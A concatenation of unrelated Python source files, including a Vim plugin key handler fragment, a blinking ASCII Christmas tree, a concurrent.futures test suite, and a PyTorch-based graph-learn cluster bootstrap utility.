lfCmd("call leaderf#colorscheme#popup#hiMode('%s', '%s')" % (self._getExplorer().getStlCategory(), self._current_mode))
self._getInstance().setPopupStl(self._current_mode)
break
elif equal(cmd, '<F5>'):
self.refresh(False)
elif equal(cmd, '<C-LeftMouse>') or equal(cmd, '<C-S>'):
if self._getExplorer().supportsMulti():
self.addSelections()
elif equal(cmd, '<S-LeftMouse>'):
if self._getExplorer().supportsMulti():
self.selectMulti()
elif equal(cmd, '<C-A>'):
if self._getExplorer().supportsMulti():
self.selectAll()
elif equal(cmd, '<C-L>'):
self.clearSelections()
elif equal(cmd, '<C-P>'):
self._ctrlp_pressed = True
self._previewResult(True)
self._ctrlp_pressed = False
elif equal(cmd, '<PageUp>'):
self._pageUp()
self._previewResult(False)
elif equal(cmd, '<PageDown>'):
self._pageDown()
self._previewResult(False)
elif equal(cmd, '<C-Up>'):
self._toUpInPopup()
elif equal(cmd, '<C-Down>'):
self._toDownInPopup()
else:
if self._cmdExtension(cmd):
break
# vim: set ts=4 sw=4 tw=0 et :
|
track_thread.py
|
from threading import Thread
from streaming import Start_stream
from time import sleep
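# Hedged sketch (not used by the script below): the same keep-alive pattern
# written so that Ctrl-C exits cleanly. It assumes Start_stream blocks for the
# stream's lifetime; the daemon flag lets the process exit without joining.
def _track_stream_interruptible():
    worker = Thread(target=Start_stream)
    worker.daemon = True
    worker.start()
    try:
        while True:
            sleep(5)
            print('d')  # heartbeat so it is obvious the main thread is alive
    except KeyboardInterrupt:
        pass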
# Start the stream in a background thread, then keep the main thread alive,
# printing a heartbeat every five seconds.
th = Thread(target=Start_stream)
th.start()
while True:
    sleep(5)
    print('d')
|
tree.py
|
#!/usr/bin/env python3
import threading
import random
import os
import time
mutex = threading.Lock()
with open('tree2.txt') as template:
    tree = list(template.read().rstrip())
def colored_dot(color):
    """Return the bullet character wrapped in the ANSI escape code for *color*."""
    if color == 'red':
        return '\033[91m●\033[0m'
    if color == 'green':
        return '\033[92m●\033[0m'
    if color == 'yellow':
        return '\033[93m●\033[0m'
    if color == 'blue':
        return '\033[94m●\033[0m'
    return '●'  # unknown color: fall back to an uncolored bullet
def lights(color, indexes):
    """Blink the bulbs at *indexes*, alternating between a colored dot and a star."""
    lit = True
    while True:
        with mutex:  # update and redraw atomically so the threads do not interleave
            for idx in indexes:
                tree[idx] = colored_dot(color) if lit else '☆'
            os.system('cls' if os.name == 'nt' else 'clear')
            print(''.join(tree))
        lit = not lit
        time.sleep(random.uniform(.5, 1.5))
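# tree2.txt is not included here; from the loop below it is assumed to be an
# ASCII-art tree in which the letters Y, R, G and B mark bulb positions. Each
# letter's index is recorded and the letter is replaced with a plain '●' so the
# lights() threads can blink that position independently.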
yellow = []
red = []
green = []
blue = []
for i, c in enumerate(tree):
if c == 'Y':
yellow.append(i)
tree[i] = '●'
if c == 'R':
red.append(i)
tree[i] = '●'
if c == 'G':
green.append(i)
tree[i] = '●'
if c == 'B':
blue.append(i)
tree[i] = '●'
ty = threading.Thread(target=lights, args=('yellow', yellow), daemon=True)
tr = threading.Thread(target=lights, args=('red', red), daemon=True)
tg = threading.Thread(target=lights, args=('green', green), daemon=True)
tb = threading.Thread(target=lights, args=('blue', blue), daemon=True)
for t in [ty, tr, tg, tb]:
t.start()
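# The light threads loop forever; joining them simply keeps the main thread alive.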
for t in [ty, tr, tg, tb]:
t.join()
|
test_futures.py
|
import os
import subprocess
import sys
import threading
import functools
import contextlib
import logging
import re
import time
import gc
import traceback
from StringIO import StringIO
from test import test_support
from concurrent import futures
from concurrent.futures._base import (
PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future, BrokenExecutor)
from concurrent.futures.thread import cpu_count
try:
import unittest2 as unittest
except ImportError:
import unittest
def reap_threads(func):
"""Use this function when threads are being used. This will
ensure that the threads are cleaned up even when the test fails.
If threading is unavailable this function does nothing.
"""
@functools.wraps(func)
def decorator(*args):
key = test_support.threading_setup()
try:
return func(*args)
finally:
test_support.threading_cleanup(*key)
return decorator
# Executing the interpreter in a subprocess
def _assert_python(expected_success, *args, **env_vars):
cmd_line = [sys.executable]
if not env_vars:
cmd_line.append('-E')
# Need to preserve the original environment, for in-place testing of
# shared library builds.
env = os.environ.copy()
# But a special flag that can be set to override -- in this case, the
# caller is responsible to pass the full environment.
if env_vars.pop('__cleanenv', None):
env = {}
env.update(env_vars)
cmd_line.extend(args)
p = subprocess.Popen(cmd_line, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
try:
out, err = p.communicate()
finally:
subprocess._cleanup()
p.stdout.close()
p.stderr.close()
rc = p.returncode
err = strip_python_stderr(err)
if (rc and expected_success) or (not rc and not expected_success):
raise AssertionError(
"Process return code is %d, "
"stderr follows:\n%s" % (rc, err.decode('ascii', 'ignore')))
return rc, out, err
def assert_python_ok(*args, **env_vars):
"""
Assert that running the interpreter with `args` and optional environment
variables `env_vars` is ok and return a (return code, stdout, stderr) tuple.
"""
return _assert_python(True, *args, **env_vars)
def strip_python_stderr(stderr):
"""Strip the stderr of a Python process from potential debug output
emitted by the interpreter.
This will typically be run on the result of the communicate() method
of a subprocess.Popen object.
"""
stderr = re.sub(r"\[\d+ refs\]\r?\n?$".encode(), "".encode(), stderr).strip()
return stderr
@contextlib.contextmanager
def captured_stderr():
    """Return a context manager that attaches a temporary StreamHandler to the
    root logger and yields the StringIO collecting everything logged to it."""
logging_stream = StringIO()
handler = logging.StreamHandler(logging_stream)
logging.root.addHandler(handler)
try:
yield logging_stream
finally:
logging.root.removeHandler(handler)
def create_future(state=PENDING, exception=None, result=None):
f = Future()
f._state = state
f._exception = exception
f._result = result
return f
PENDING_FUTURE = create_future(state=PENDING)
RUNNING_FUTURE = create_future(state=RUNNING)
CANCELLED_FUTURE = create_future(state=CANCELLED)
CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED)
EXCEPTION_FUTURE = create_future(state=FINISHED, exception=IOError())
SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42)
def mul(x, y):
return x * y
def sleep_and_raise(t):
time.sleep(t)
raise Exception('this is an exception')
def sleep_and_print(t, msg):
time.sleep(t)
print(msg)
sys.stdout.flush()
class ExecutorMixin:
worker_count = 5
def setUp(self):
self.t1 = time.time()
try:
self.executor = self.executor_type(max_workers=self.worker_count)
except NotImplementedError:
e = sys.exc_info()[1]
self.skipTest(str(e))
self._prime_executor()
def tearDown(self):
self.executor.shutdown(wait=True)
dt = time.time() - self.t1
if test_support.verbose:
print("%.2fs" % dt)
self.assertLess(dt, 60, "synchronization issue: test lasted too long")
def _prime_executor(self):
# Make sure that the executor is ready to do work before running the
# tests. This should reduce the probability of timeouts in the tests.
futures = [self.executor.submit(time.sleep, 0.1)
for _ in range(self.worker_count)]
for f in futures:
f.result()
class ThreadPoolMixin(ExecutorMixin):
executor_type = futures.ThreadPoolExecutor
class ProcessPoolMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
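# The test cases below refer only to self.executor; the concrete thread- and
# process-pool variants are produced further down by combining each test class
# with ThreadPoolMixin or ProcessPoolMixin (e.g. ThreadPoolShutdownTest).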
class ExecutorShutdownTest(unittest.TestCase):
def test_run_after_shutdown(self):
self.executor.shutdown()
self.assertRaises(RuntimeError,
self.executor.submit,
pow, 2, 5)
def test_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
from concurrent.futures import %s
from time import sleep
from test_futures import sleep_and_print
t = %s(5)
t.submit(sleep_and_print, 1.0, "apple")
""" % (self.executor_type.__name__, self.executor_type.__name__))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertFalse(err)
self.assertEqual(out.strip(), "apple".encode())
def test_hang_issue12364(self):
fs = [self.executor.submit(time.sleep, 0.1) for _ in range(50)]
self.executor.shutdown()
for f in fs:
f.result()
class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest):
def _prime_executor(self):
pass
def test_threads_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
def acquire_lock(lock):
lock.acquire()
sem = threading.Semaphore(0)
for i in range(3):
self.executor.submit(acquire_lock, sem)
self.assertEqual(len(self.executor._threads), 3)
for i in range(3):
sem.release()
self.executor.shutdown()
for t in self.executor._threads:
t.join(5)
def test_context_manager_shutdown(self):
with futures.ThreadPoolExecutor(max_workers=5) as e:
executor = e
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for t in executor._threads:
t.join(5)
def test_del_shutdown(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
gc.collect()
gc.collect()
for t in threads:
t.join(5)
def test_thread_names_assigned(self):
executor = futures.ThreadPoolExecutor(
max_workers=5, thread_name_prefix='SpecialPool')
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
gc.collect()
gc.collect()
for t in threads:
self.assertRegexpMatches(t.name, r'^SpecialPool_[0-4]$')
t.join(5)
def test_thread_names_default(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
gc.collect()
gc.collect()
for t in threads:
# Ensure that our default name is reasonably sane and unique when
# no thread_name_prefix was supplied.
self.assertRegexpMatches(t.name, r'ThreadPoolExecutor-\d+_[0-4]$')
t.join(5)
class ProcessPoolShutdownTest(ProcessPoolMixin, ExecutorShutdownTest):
def _prime_executor(self):
pass
def test_processes_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._processes), 5)
processes = self.executor._processes
self.executor.shutdown()
for p in processes:
p.join(5)
def test_context_manager_shutdown(self):
with futures.ProcessPoolExecutor(max_workers=5) as e:
processes = e._processes
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for p in processes:
p.join(5)
def test_del_shutdown(self):
executor = futures.ProcessPoolExecutor(max_workers=5)
list(executor.map(abs, range(-5, 5)))
queue_management_thread = executor._queue_management_thread
processes = executor._processes
del executor
gc.collect()
gc.collect()
queue_management_thread.join(5)
for p in processes:
p.join(5)
class WaitTests(unittest.TestCase):
def test_first_completed(self):
future1 = self.executor.submit(mul, 21, 2)
future2 = self.executor.submit(time.sleep, 1.5)
done, not_done = futures.wait(
[CANCELLED_FUTURE, future1, future2],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(set([future1]), done)
self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done)
def test_first_completed_some_already_completed(self):
future1 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(
set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]),
finished)
self.assertEqual(set([future1]), pending)
def test_first_exception(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(sleep_and_raise, 1.5)
future3 = self.executor.submit(time.sleep, 3)
finished, pending = futures.wait(
[future1, future2, future3],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([future1, future2]), finished)
self.assertEqual(set([future3]), pending)
def test_first_exception_some_already_complete(self):
future1 = self.executor.submit(divmod, 21, 0)
future2 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1, future2],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1]), finished)
self.assertEqual(set([CANCELLED_FUTURE, future2]), pending)
def test_first_exception_one_already_failed(self):
future1 = self.executor.submit(time.sleep, 2)
finished, pending = futures.wait(
[EXCEPTION_FUTURE, future1],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([EXCEPTION_FUTURE]), finished)
self.assertEqual(set([future1]), pending)
def test_all_completed(self):
future1 = self.executor.submit(divmod, 2, 0)
future2 = self.executor.submit(mul, 2, 21)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2],
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2]), finished)
self.assertEqual(set(), pending)
def test_timeout(self):
future1 = self.executor.submit(mul, 6, 7)
future2 = self.executor.submit(time.sleep, 3)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2],
timeout=1.5,
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1]), finished)
self.assertEqual(set([future2]), pending)
class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests):
def test_pending_calls_race(self):
# Issue #14406: multi-threaded race condition when waiting on all
# futures.
event = threading.Event()
def future_func():
event.wait()
oldswitchinterval = sys.getcheckinterval()
sys.setcheckinterval(1)
try:
fs = set(self.executor.submit(future_func) for i in range(100))
event.set()
futures.wait(fs, return_when=futures.ALL_COMPLETED)
finally:
sys.setcheckinterval(oldswitchinterval)
class ProcessPoolWaitTests(ProcessPoolMixin, WaitTests):
pass
class AsCompletedTests(unittest.TestCase):
# TODO(brian@sweetapp.com): Should have a test with a non-zero timeout.
def test_no_timeout(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(mul, 7, 6)
completed = set(futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]))
self.assertEqual(set(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]),
completed)
def test_zero_timeout(self):
future1 = self.executor.submit(time.sleep, 2)
completed_futures = set()
try:
for future in futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1],
timeout=0):
completed_futures.add(future)
except futures.TimeoutError:
pass
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE]),
completed_futures)
def test_duplicate_futures(self):
# Issue 20367. Duplicate futures should not raise exceptions or give
# duplicate responses.
future1 = self.executor.submit(time.sleep, 2)
completed = [f for f in futures.as_completed([future1,future1])]
self.assertEqual(len(completed), 1)
class ThreadPoolAsCompletedTests(ThreadPoolMixin, AsCompletedTests):
pass
class ProcessPoolAsCompletedTests(ProcessPoolMixin, AsCompletedTests):
pass
class ExecutorTest(unittest.TestCase):
# Executor.shutdown() and context manager usage is tested by
# ExecutorShutdownTest.
def test_submit(self):
future = self.executor.submit(pow, 2, 8)
self.assertEqual(256, future.result())
def test_submit_keyword(self):
future = self.executor.submit(mul, 2, y=8)
self.assertEqual(16, future.result())
def test_map(self):
self.assertEqual(
list(self.executor.map(pow, range(10), range(10))),
list(map(pow, range(10), range(10))))
def test_map_exception(self):
i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5])
self.assertEqual(next(i), (0, 1))
self.assertEqual(next(i), (0, 1))
self.assertRaises(ZeroDivisionError, next, i)
def test_map_timeout(self):
results = []
try:
for i in self.executor.map(time.sleep,
[0, 0, 3],
timeout=1.5):
results.append(i)
except futures.TimeoutError:
pass
else:
self.fail('expected TimeoutError')
self.assertEqual([None, None], results)
def test_max_workers_negative(self):
for number in (0, -1):
with self.assertRaises(ValueError) as cm:
self.executor_type(max_workers=number)
            self.assertEqual(str(cm.exception),
                             "max_workers must be greater than 0")
class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest):
def test_map_submits_without_iteration(self):
"""Tests verifying issue 11777."""
finished = []
def record_finished(n):
finished.append(n)
self.executor.map(record_finished, range(10))
self.executor.shutdown(wait=True)
self.assertEqual(len(finished), 10)
def test_default_workers(self):
executor = self.executor_type()
self.assertEqual(executor._max_workers,
(cpu_count() or 1) * 5)
def test_thread_initializer(self):
initialized = []
def initializer(i):
initialized.append(i)
executor = self.executor_type(initializer=initializer, initargs=(1,))
executor.submit(time.sleep, 1)
executor.submit(time.sleep, 1)
executor.shutdown(wait=True)
self.assertEqual(initialized, [1, 1])
def test_broken_thread_initializer(self):
def broken_initializer(i):
raise ValueError()
executor = self.executor_type(initializer=broken_initializer)
with self.assertRaises(BrokenExecutor):
executor.submit(time.sleep, 1).result()
with self.assertRaises(BrokenExecutor):
executor.submit(time.sleep, 1)
executor.shutdown(wait=True)
def test_saturation(self):
executor = self.executor_type(4)
def acquire_lock(lock):
lock.acquire()
sem = threading.Semaphore(0)
for i in range(15 * executor._max_workers):
executor.submit(acquire_lock, sem)
self.assertEqual(len(executor._threads), executor._max_workers)
for i in range(15 * executor._max_workers):
sem.release()
executor.shutdown(wait=True)
def test_idle_thread_reuse(self):
executor = self.executor_type()
executor.submit(mul, 21, 2).result()
executor.submit(mul, 6, 7).result()
executor.submit(mul, 3, 14).result()
self.assertEqual(len(executor._threads), 1)
executor.shutdown(wait=True)
class ProcessPoolExecutorTest(ProcessPoolMixin, ExecutorTest):
pass
class FutureTests(unittest.TestCase):
def test_done_callback_with_result(self):
callback_result = [None]
def fn(callback_future):
callback_result[0] = callback_future.result()
f = Future()
f.add_done_callback(fn)
f.set_result(5)
self.assertEqual(5, callback_result[0])
def test_done_callback_with_exception(self):
callback_exception = [None]
def fn(callback_future):
callback_exception[0] = callback_future.exception()
f = Future()
f.add_done_callback(fn)
f.set_exception(Exception('test'))
self.assertEqual(('test',), callback_exception[0].args)
def test_done_callback_with_cancel(self):
was_cancelled = [None]
def fn(callback_future):
was_cancelled[0] = callback_future.cancelled()
f = Future()
f.add_done_callback(fn)
self.assertTrue(f.cancel())
self.assertTrue(was_cancelled[0])
def test_done_callback_raises(self):
with captured_stderr() as stderr:
raising_was_called = [False]
raising_old_style_was_called = [False]
fn_was_called = [False]
def raising_fn(callback_future):
raising_was_called[0] = True
raise Exception('doh!')
def raising_old_style_fn(callback_future):
raising_old_style_was_called[0] = True
class OldStyle: # Does not inherit from object
def __str__(self):
return 'doh!'
raise OldStyle()
def fn(callback_future):
fn_was_called[0] = True
f = Future()
f.add_done_callback(raising_fn)
f.add_done_callback(raising_old_style_fn)
f.add_done_callback(fn)
f.set_result(5)
self.assertTrue(raising_was_called)
self.assertTrue(raising_old_style_was_called)
self.assertTrue(fn_was_called)
self.assertIn('Exception: doh!', stderr.getvalue())
self.assertIn('OldStyle: doh!', stderr.getvalue())
def test_done_callback_already_successful(self):
callback_result = [None]
def fn(callback_future):
callback_result[0] = callback_future.result()
f = Future()
f.set_result(5)
f.add_done_callback(fn)
self.assertEqual(5, callback_result[0])
def test_done_callback_already_failed(self):
callback_exception = [None]
def fn(callback_future):
callback_exception[0] = callback_future.exception()
f = Future()
f.set_exception(Exception('test'))
f.add_done_callback(fn)
self.assertEqual(('test',), callback_exception[0].args)
def test_done_callback_already_cancelled(self):
was_cancelled = [None]
def fn(callback_future):
was_cancelled[0] = callback_future.cancelled()
f = Future()
self.assertTrue(f.cancel())
f.add_done_callback(fn)
self.assertTrue(was_cancelled[0])
def test_repr(self):
self.assertRegexpMatches(repr(PENDING_FUTURE),
'<Future at 0x[0-9a-f]+L? state=pending>')
self.assertRegexpMatches(repr(RUNNING_FUTURE),
'<Future at 0x[0-9a-f]+L? state=running>')
self.assertRegexpMatches(repr(CANCELLED_FUTURE),
'<Future at 0x[0-9a-f]+L? state=cancelled>')
self.assertRegexpMatches(repr(CANCELLED_AND_NOTIFIED_FUTURE),
'<Future at 0x[0-9a-f]+L? state=cancelled>')
self.assertRegexpMatches(
repr(EXCEPTION_FUTURE),
'<Future at 0x[0-9a-f]+L? state=finished raised IOError>')
self.assertRegexpMatches(
repr(SUCCESSFUL_FUTURE),
'<Future at 0x[0-9a-f]+L? state=finished returned int>')
def test_cancel(self):
f1 = create_future(state=PENDING)
f2 = create_future(state=RUNNING)
f3 = create_future(state=CANCELLED)
f4 = create_future(state=CANCELLED_AND_NOTIFIED)
f5 = create_future(state=FINISHED, exception=IOError())
f6 = create_future(state=FINISHED, result=5)
self.assertTrue(f1.cancel())
self.assertEqual(f1._state, CANCELLED)
self.assertFalse(f2.cancel())
self.assertEqual(f2._state, RUNNING)
self.assertTrue(f3.cancel())
self.assertEqual(f3._state, CANCELLED)
self.assertTrue(f4.cancel())
self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED)
self.assertFalse(f5.cancel())
self.assertEqual(f5._state, FINISHED)
self.assertFalse(f6.cancel())
self.assertEqual(f6._state, FINISHED)
def test_cancelled(self):
self.assertFalse(PENDING_FUTURE.cancelled())
self.assertFalse(RUNNING_FUTURE.cancelled())
self.assertTrue(CANCELLED_FUTURE.cancelled())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled())
self.assertFalse(EXCEPTION_FUTURE.cancelled())
self.assertFalse(SUCCESSFUL_FUTURE.cancelled())
def test_done(self):
self.assertFalse(PENDING_FUTURE.done())
self.assertFalse(RUNNING_FUTURE.done())
self.assertTrue(CANCELLED_FUTURE.done())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done())
self.assertTrue(EXCEPTION_FUTURE.done())
self.assertTrue(SUCCESSFUL_FUTURE.done())
def test_running(self):
self.assertFalse(PENDING_FUTURE.running())
self.assertTrue(RUNNING_FUTURE.running())
self.assertFalse(CANCELLED_FUTURE.running())
self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running())
self.assertFalse(EXCEPTION_FUTURE.running())
self.assertFalse(SUCCESSFUL_FUTURE.running())
def test_result_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.result, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0)
self.assertRaises(IOError, EXCEPTION_FUTURE.result, timeout=0)
self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42)
def test_result_with_success(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.set_result(42)
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertEqual(f1.result(timeout=5), 42)
def test_result_with_cancel(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.cancel()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertRaises(futures.CancelledError, f1.result, timeout=5)
def test_exception_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.exception, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0)
self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0),
IOError))
self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None)
def test_exception_with_success(self):
def notification():
# Wait until the main thread is waiting for the exception.
time.sleep(1)
with f1._condition:
f1._state = FINISHED
f1._exception = IOError()
f1._condition.notify_all()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertTrue(isinstance(f1.exception(timeout=5), IOError))
def test_old_style_exception(self):
class OldStyle: # Does not inherit from object
def __str__(self):
return 'doh!'
callback_exc_info = [None]
def fn(callback_future):
callback_exc_info[0] = callback_future.exception_info()
f = Future()
f.add_done_callback(fn)
try:
raise OldStyle()
except OldStyle:
want_exc_info = sys.exc_info()
f.set_exception_info(*want_exc_info[1:])
self.assertEqual(f.exception_info(), want_exc_info[1:])
self.assertEqual(callback_exc_info[0], want_exc_info[1:])
try:
f.result()
except OldStyle:
got_exc_info = sys.exc_info()
else:
self.fail('OldStyle exception not raised')
self.assertEqual(got_exc_info[:2], want_exc_info[:2])
got_tb = traceback.extract_tb(got_exc_info[2])
want_tb = traceback.extract_tb(want_exc_info[2])
self.assertEqual(got_tb[-len(want_tb):], want_tb)
@reap_threads
def test_main():
try:
test_support.run_unittest(ProcessPoolExecutorTest,
ThreadPoolExecutorTest,
ProcessPoolWaitTests,
ThreadPoolWaitTests,
ProcessPoolAsCompletedTests,
ThreadPoolAsCompletedTests,
FutureTests,
ProcessPoolShutdownTest,
ThreadPoolShutdownTest)
finally:
test_support.reap_children()
if __name__ == "__main__":
test_main()
|
utils.py
|
# Copyright 2021 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import socket
import warnings
import multiprocessing as mp
import torch
import torch.distributed as dist
SERVER_LAUNCHED = False
CLUSTER_SPEC = None
WORLD_SIZE = None
RANK = None
NUM_CLIENT = None
def get_world_size():
global WORLD_SIZE
if WORLD_SIZE is None:
if dist.is_initialized():
WORLD_SIZE = dist.get_world_size()
else:
WORLD_SIZE = int(os.getenv('WORLD_SIZE', 1))
return WORLD_SIZE
def get_rank():
global RANK
if RANK is None:
if dist.is_initialized():
RANK = dist.get_rank()
else:
RANK = int(os.getenv('RANK', 0))
return RANK
def get_num_client():
global NUM_CLIENT
if NUM_CLIENT is None:
NUM_CLIENT = int(os.getenv('GL_NUM_CLIENT', 1))
return NUM_CLIENT
def get_cluster_spec():
global CLUSTER_SPEC
if CLUSTER_SPEC is None:
world_size = get_world_size()
rank = get_rank()
num_client = get_num_client()
gl_server_info = bootstrap(world_size, rank)
CLUSTER_SPEC = {"server": gl_server_info, 'client_count': world_size * num_client}
return CLUSTER_SPEC
def set_client_num(n):
assert isinstance(n, int), 'client_num should be int, not {}'.format(str(type(n)))
global NUM_CLIENT
if NUM_CLIENT is not None:
warnings.warn('graph learn client number has already been configured')
else:
NUM_CLIENT = n
def bootstrap(world_size, rank):
def get_free_port(host='127.0.0.1'):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((host, 0))
port = sock.getsockname()[1]
sock.close()
return port
def addr_to_tensor(ip, port):
addr_array = [int(i) for i in (ip.split('.'))] + [int(port)]
addr_tensor = torch.tensor(addr_array, dtype=torch.int)
return addr_tensor
def tensor_to_addr(tensor):
addr_array = tensor.tolist()
addr = '.'.join([str(i) for i in addr_array[:-1]]) + ':' + str(addr_array[-1])
return addr
def exchange_gl_server_info(addr_tensor, world_size, rank):
comm_tensor = torch.zeros([world_size, 5], dtype=torch.int32)
comm_tensor[rank] = addr_tensor
if dist.get_backend() == dist.Backend.NCCL:
comm_tensor = comm_tensor.cuda()
dist.all_reduce(comm_tensor, op=dist.ReduceOp.MAX)
cluster_server_info = ','.join([tensor_to_addr(t) for t in comm_tensor])
return cluster_server_info
if not dist.is_initialized():
raise RuntimeError('graph learn bootstrap relies on torch.distributed, which is not initialized.')
local_ip = socket.gethostbyname(socket.gethostname())
port = str(get_free_port(local_ip))
gl_server_info = exchange_gl_server_info(addr_to_tensor(local_ip, port), world_size, rank)
return gl_server_info
def _server_manager(graph, cluster, task_index):
graph.init(cluster=cluster, job_name="server", task_index=task_index)
graph.wait_for_close()
def launch_server(g, cluster=None, task_index=None):
global SERVER_LAUNCHED
if SERVER_LAUNCHED:
raise RuntimeError('duplicate server launch detected')
if cluster is None:
cluster = get_cluster_spec()
task_index = get_rank()
elif task_index is None:
raise UserWarning('task_index must be explicitly defined when the cluster is defined by the user')
p = mp.Process(target=_server_manager, args=(g, cluster, task_index, ))
p.daemon = True
p.start()
SERVER_LAUNCHED = True
def is_server_launched():
global SERVER_LAUNCHED
return SERVER_LAUNCHED
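# --- Illustrative usage sketch (added for documentation; not part of the original
# module). It only exercises the environment-variable fallbacks and the client
# count, which work without an initialized torch.distributed process group.
# get_cluster_spec() / launch_server() additionally require dist.init_process_group()
# to have been called and a graphlearn Graph instance, both outside this sketch.
if __name__ == '__main__':
    os.environ.setdefault('WORLD_SIZE', '2')  # pretend this is a 2-worker job
    os.environ.setdefault('RANK', '0')
    set_client_num(4)
    print('world_size =', get_world_size())   # falls back to the WORLD_SIZE env var
    print('rank       =', get_rank())         # falls back to the RANK env var
    print('clients    =', get_num_client())   # value set above via set_client_num()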
|
mtime_file_watcher.py
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
